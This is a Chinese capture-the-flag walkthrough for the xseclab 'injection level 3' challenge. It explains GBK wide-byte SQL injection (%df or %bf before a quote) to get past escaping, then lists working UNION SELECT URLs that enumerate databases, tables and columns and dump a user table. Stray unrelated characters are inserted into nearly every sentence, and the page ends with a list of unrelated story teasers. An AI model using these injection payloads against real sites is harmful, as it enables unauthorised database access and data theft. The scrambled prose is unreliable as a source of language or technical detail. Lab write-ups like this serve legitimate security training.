網(wǎng)絡(luò)信息安全攻防學(xué)習(xí)平臺(tái) 注入關(guān)第三

防注入分值: 300

小明終于知道敬惦,原來(lái)黑客如此的吊神凑,還有sql注入這種高端技術(shù)谣膳,因此他開始學(xué)習(xí)防注入竿报!

通關(guān)地址

老辦法,沒有信息就看F12唄

html里面有一個(gè)tip? id=1?

ok 知道該怎么做了? http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1



然后嘗試來(lái)一個(gè)單引號(hào) '??

界面不行了继谚,啥也沒有烈菌,說(shuō)明waf過(guò)濾了單引號(hào),

這個(gè)時(shí)候就要考慮到用寬字節(jié)%df繞過(guò)

經(jīng)測(cè)試花履,只要是寬字節(jié)都可以比如使用%e0芽世。

ascii碼大于127的均為寬子節(jié)

這里略帶一提

該漏洞最早2006年被國(guó)外用來(lái)討論數(shù)據(jù)庫(kù)字符集設(shè)為GBK時(shí),0xbf27本身不是一個(gè)有效的GBK字符诡壁,但經(jīng)過(guò)? addslashes()

轉(zhuǎn)換后變?yōu)?xbf5c27济瓢,前面的0xbf5c是個(gè)有效的GBK字符,所以0xbf5c27會(huì)被當(dāng)作一個(gè)字符0xbf5c和一個(gè)單引號(hào)來(lái)處理妹卿,結(jié)果漏洞就觸發(fā)了

也就是說(shuō):%df\’ = %df%5c%27=縗’旺矾,有了單引號(hào)就好注入了



GBK編碼蔑鹦,它的編碼范圍是0x8140~0xFEFE(不包括xx7F),在遇到%df(ascii(223)) >ascii(128)時(shí)自動(dòng)拼接%5c宠漩,因此吃掉‘\’举反,

在這里 %5c就是‘\’

%df在碰到%5c后,會(huì)被拼接在一起變成

而%27扒吁、%20小于ascii(128)的字符就保留了火鼻。

若有些關(guān)于unicod,utf-8雕崩,gbk魁索,之類的不清楚的可以查一下知乎以及? http://www.91ri.org/8611.html

我們?cè)谳斎肓?/p>

?id=2%df%27%20order%20by%203%23

實(shí)際上等于?id=2%df' order by 3#

?id=2%df%27%20order%20by%204%23

之后,可以判斷出盼铁,字段數(shù)為3?

then

lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%df%27%20UNION%20SELECT%201,2,3%23


出現(xiàn)了2和3

接下去按著前一篇文章慢慢來(lái)

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%bf%27%20union%20select%201,concat(group_concat(distinct+schema_name)),3%20from%20information_schema.schemata%23

這個(gè)url有點(diǎn)長(zhǎng)啊粗蔚。。饶火。主要用到的是concat(group_concat(distinct+schema_name))

至于每個(gè)函數(shù)的功能自己查吧


然后就是自己翻? ? ?用這個(gè)

concat(group_concat(distinct+table_name))

打開mydbs

別打開test了鹏控。。肤寝。我已經(jīng)打開過(guò)了当辐。里面啥都沒有!鲤看!


next

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2?' union select 1,concat(group_concat(distinct+column_name )),3 from information_schema.columns where table_name=0x7361655F757365725F73716C6934#


勝利就在前方T稻尽!义桂!

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2?' union select 1,concat(group_concat(id,0x3a,title_1,0x3a,content_1)),3 from sae_user_sqli4 #


OK了找筝,這兩道題的套路都還差不多了,希望大家多熟悉熟悉

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末慷吊,一起剝皮案震驚了整個(gè)濱河市袖裕,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌溉瓶,老刑警劉巖急鳄,帶你破解...
    沈念sama閱讀 210,914評(píng)論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異嚷闭,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)赖临,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 89,935評(píng)論 2 383
  • 文/潘曉璐 我一進(jìn)店門胞锰,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人兢榨,你說(shuō)我怎么就攤上這事嗅榕∷骋” “怎么了?”我有些...
    開封第一講書人閱讀 156,531評(píng)論 0 345
  • 文/不壞的土叔 我叫張陵凌那,是天一觀的道長(zhǎng)兼雄。 經(jīng)常有香客問我,道長(zhǎng)帽蝶,這世上最難降的妖魔是什么赦肋? 我笑而不...
    開封第一講書人閱讀 56,309評(píng)論 1 282
  • 正文 為了忘掉前任,我火速辦了婚禮励稳,結(jié)果婚禮上佃乘,老公的妹妹穿的比我還像新娘。我一直安慰自己驹尼,他們只是感情好趣避,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,381評(píng)論 5 384
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著新翎,像睡著了一般程帕。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上地啰,一...
    開封第一講書人閱讀 49,730評(píng)論 1 289
  • 那天愁拭,我揣著相機(jī)與錄音,去河邊找鬼髓绽。 笑死敛苇,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的顺呕。 我是一名探鬼主播枫攀,決...
    沈念sama閱讀 38,882評(píng)論 3 404
  • 文/蒼蘭香墨 我猛地睜開眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼株茶!你這毒婦竟也來(lái)了来涨?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,643評(píng)論 0 266
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤启盛,失蹤者是張志新(化名)和其女友劉穎蹦掐,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體僵闯,經(jīng)...
    沈念sama閱讀 44,095評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡卧抗,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,448評(píng)論 2 325
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了鳖粟。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片社裆。...
    茶點(diǎn)故事閱讀 38,566評(píng)論 1 339
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖向图,靈堂內(nèi)的尸體忽然破棺而出泳秀,到底是詐尸還是另有隱情标沪,我是刑警寧澤,帶...
    沈念sama閱讀 34,253評(píng)論 4 328
  • 正文 年R本政府宣布嗜傅,位于F島的核電站金句,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏吕嘀。R本人自食惡果不足惜违寞,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,829評(píng)論 3 312
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望币他。 院中可真熱鬧坞靶,春花似錦、人聲如沸蝴悉。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,715評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)拍冠。三九已至尿这,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間庆杜,已是汗流浹背射众。 一陣腳步聲響...
    開封第一講書人閱讀 31,945評(píng)論 1 264
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留晃财,地道東北人叨橱。 一個(gè)月前我還...
    沈念sama閱讀 46,248評(píng)論 2 360
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像断盛,于是被迫代替她去往敵國(guó)和親罗洗。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,440評(píng)論 2 348

推薦閱讀更多精彩內(nèi)容